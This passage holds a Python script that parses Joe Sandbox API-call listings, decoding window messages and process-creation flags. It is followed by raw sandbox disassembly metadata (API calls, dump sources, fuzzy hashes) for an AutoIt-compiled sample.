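#   • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DB1D4C
#   • CloseHandle.KERNEL32 ref: 00DE81D1
#   • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)


def parse_api_line(line):
    """Return {'api', 'args', 'ref', 'subcall'} for one bullet line, or None if it is not one."""
    text = line.strip().lstrip("•").strip()
    m = API_LINE.match(text)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    return {"api": f"{m['name']}.{m['module']}", "args": args,
            "ref": m["ref"], "subcall": m["subfn"]}


def _hex_arg(args, index):
    """Static argument value at `index`, or None when the report prints '?' (not recoverable)."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def decode_message(call):
    """Name the uMsg (second argument) of a Send/PostMessage call; unknown IDs come back as hex."""
    if not call["api"].startswith(("SendMessage", "PostMessage")):
        return None
    msg = _hex_arg(call["args"], 1)
    return None if msg is None else MSG_NAMES.get(msg, f"0x{msg:04X}")


def decode_creation_flags(call):
    """Split CreateProcess's dwCreationFlags (sixth argument) into named bits."""
    if not call["api"].startswith("CreateProcess"):
        return None
    flags = _hex_arg(call["args"], 5)
    if flags is None:
        return None
    names = [n for bit, n in CREATION_FLAGS.items() if flags & bit]
    rest = flags & ~sum(CREATION_FLAGS)  # bits not covered by the table
    if rest:
        names.append(f"0x{rest:08X}")
    return names or ["0"]


def parse_listing(text):
    """Split the listing into per-function records; each 'APIs' header opens one, 'Strings' closes it."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"own": [], "inlined": [], "messages": [], "creation_flags": None}
            functions.append(current)
        elif line == "Strings":
            current = None
        elif current is not None:
            call = parse_api_line(line)
            if call is None:
                continue
            # "Part of subcall function" lines belong to a callee, not to this function.
            (current["inlined"] if call["subcall"] else current["own"]).append(call)
            msg = decode_message(call)
            if msg:
                current["messages"].append(msg)
            flags = decode_creation_flags(call)
            if flags:
                current["creation_flags"] = flags
    return functions


# Constructed sample: four entries copied from the listing on this page.
SAMPLE_LISTING = """\
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00DE34AB
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DE34BA
Strings
Memory Dump Source
APIs
  • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
  • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DB1D4C
Strings
APIs
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00DB1DD3
Strings
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E23018,00E2305C), ref: 00DE81BF
• CloseHandle.KERNEL32 ref: 00DE81D1
Strings
"""

if __name__ == "__main__":
    for fn in parse_listing(SAMPLE_LISTING):
        own = ", ".join(c["api"].split(".")[0] for c in fn["own"])
        print(f"{own:45} msgs={fn['messages']} flags={fn['creation_flags']}")
```

Run against the four constructed entries, the script reports EM_SETSEL for the edit-control function, LB_FINDSTRINGEXACT and LB_GETCOUNT for the two list-box handlers, and NORMAL_PRIORITY_CLASS for the CreateProcessW call. A second argument printed as `?` means the sandbox could not recover the value statically, so the decoder returns None for it rather than guessing.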
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: 3, 3, 16, 1
                                                                                                            • API String ID: 176396367-3042988571
                                                                                                            • Opcode ID: bd613eb22cc8d0bdebc73dc4e7c17a29308750e8b67a1feba929658bf66e58aa
                                                                                                            • Instruction ID: 0c0081114d4122bdd4484bd56494274491a1a6504f8ba6ef5ee002fb0ff76e46
                                                                                                            • Opcode Fuzzy Hash: bd613eb22cc8d0bdebc73dc4e7c17a29308750e8b67a1feba929658bf66e58aa
                                                                                                            • Instruction Fuzzy Hash: 44E02B122043201192331279DCC197F5689CFC5760714186FFA89C2366FB948D9193B1
                                                                                                            APIs
                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DB0B23
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message
                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                            • Opcode ID: d6964913550c7083678bf30fd4b481d37a94f63df483a617465e974ef00b7cb3
                                                                                                            • Instruction ID: 2775e1c24c21969304da08965c7ae233038436ef7ae45843035a6e84578addf6
                                                                                                            • Opcode Fuzzy Hash: d6964913550c7083678bf30fd4b481d37a94f63df483a617465e974ef00b7cb3
                                                                                                            • Instruction Fuzzy Hash: 6DE0D8322843486BD21537557C03FC97E84CF05B21F100426FF58955C3CBE2689006B9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D6F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D70D71,?,?,?,00D5100A), ref: 00D6F7CE
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00D5100A), ref: 00D70D75
                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D5100A), ref: 00D70D84
                                                                                                            Strings
                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D70D7F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                            • API String ID: 55579361-631824599
                                                                                                            • Opcode ID: c729ab452396e63318835b80879bdb20427c02cf7f0c2d3e88d2efd943b55364
                                                                                                            • Instruction ID: 024dbd55c12e0f0164fdc52db44bd9f0ae45c9d8511419c13a5d10d5131e1298
                                                                                                            • Opcode Fuzzy Hash: c729ab452396e63318835b80879bdb20427c02cf7f0c2d3e88d2efd943b55364
                                                                                                            • Instruction Fuzzy Hash: D8E06D702007918FD330AFB9E4443427FE0EB10B45F04896DE886CAB91EBB0E4498BB1
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00D6E3D5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Init_thread_footer
                                                                                                            • String ID: 0%$8%
                                                                                                            • API String ID: 1385522511-2949748613
                                                                                                            • Opcode ID: 8343d5d9c35d9c974fc63878709101743e1494289b0a2f5ed6b00ea4e0c128e0
                                                                                                            • Instruction ID: 1d0e91ac54cc2087b25dcf94342e189dec56b7a1cf7af2e242432d35997bbf29
                                                                                                            • Opcode Fuzzy Hash: 8343d5d9c35d9c974fc63878709101743e1494289b0a2f5ed6b00ea4e0c128e0
                                                                                                            • Instruction Fuzzy Hash: 29E02635880A20EFC614A71DF855A883351EF49321B90D16CE602AB2D1EB342846867A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: %.3d$X64
                                                                                                            • API String ID: 481472006-1077770165
                                                                                                            • Opcode ID: 62451f2276c387be11fb1e2ac8334e7c899b5145f54b640949658e0329ba1771
                                                                                                            • Instruction ID: db239eac5b319d6d39fbf0826374917b944209a75e7ec02bca261aab55414021
                                                                                                            • Opcode Fuzzy Hash: 62451f2276c387be11fb1e2ac8334e7c899b5145f54b640949658e0329ba1771
                                                                                                            • Instruction Fuzzy Hash: CDD012B1C08209EACB5097D0DC45AF9B37DFB0A301F508452F997E1440D634C548E775
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE236C
                                                                                                            • PostMessageW.USER32(00000000), ref: 00DE2373
                                                                                                              • Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            • Opcode ID: 7eb64cb5b014aab2f93f3fa17c028f4b8d1423b1198176b93045442812782c38
                                                                                                            • Instruction ID: 6ace39208ff3ce88a5c48aadb767f44b3232d52bf10fbdda0e1c007a50b1eeac
                                                                                                            • Opcode Fuzzy Hash: 7eb64cb5b014aab2f93f3fa17c028f4b8d1423b1198176b93045442812782c38
                                                                                                            • Instruction Fuzzy Hash: F1D0C936391350BBE664B7709C4FFCA66149B04B10F0059167646EA2E0C9A0B8468A64
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE232C
                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DE233F
                                                                                                              • Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            • Opcode ID: 75a4b4a2c53dcb9df7ff376b68a5d15fee8079c549cdc9bdacf026ff682d0949
                                                                                                            • Instruction ID: e602632b255da90fc2ebd1924c702f4a40f10a651cada688287d71cc2d178ff3
                                                                                                            • Opcode Fuzzy Hash: 75a4b4a2c53dcb9df7ff376b68a5d15fee8079c549cdc9bdacf026ff682d0949
                                                                                                            • Instruction Fuzzy Hash: 37D0C9363A5350BBE664B7709C4FFCA6A149B00B10F005916764AEA2E0C9A0A8468A64
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D8BE93
                                                                                                            • GetLastError.KERNEL32 ref: 00D8BEA1
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8BEFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1717984340-0
                                                                                                            • Opcode ID: d85244668c5ac5c15b92c28fe5a5c15da8ab9eb78035d85d4a9d9d83da2a0a68
                                                                                                            • Instruction ID: 3350abcd07f1f0050b69c248e7b8a818dca59e601575deeffc302766793ae882
                                                                                                            • Opcode Fuzzy Hash: d85244668c5ac5c15b92c28fe5a5c15da8ab9eb78035d85d4a9d9d83da2a0a68
                                                                                                            • Instruction Fuzzy Hash: 2B41B735605206AFCF32AF65CC44ABE7BA5EF41730F18416AFA599B1A1DB318D01CB70